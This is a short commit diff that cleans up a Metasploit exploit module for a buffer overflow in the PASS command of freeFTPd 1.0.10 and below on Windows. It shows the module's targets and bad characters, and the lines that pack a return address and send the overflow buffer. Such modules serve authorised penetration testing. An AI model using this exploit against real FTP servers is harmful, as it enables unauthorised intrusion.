Clean up freeftpd_pass

bug/bundler_fix
jvazquez-r7 2013-09-27 09:47:39 -05:00
parent b02a2b9ce0
commit 6381bbfd39
1 changed files with 4 additions and 4 deletions

View File

@ -34,15 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote
[
['OSVDB', '96517'],
['EDB', '27747'],
['BID', '61905'],
['URL', 'http://www.freesshd.com']
['BID', '61905']
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Arch' => [ ARCH_X86 ],
'Arch' => ARCH_X86,
'Targets' =>
[
['freeFTPd 1.0.10 and below on Windows Desktop Version',
@ -97,7 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote
bof << [target.ret].pack('V')
send_user(datastore['FTPUSER'])
send_pass(bof)
raw_send("PASS #{bof}\r\n")
disconnect
end
end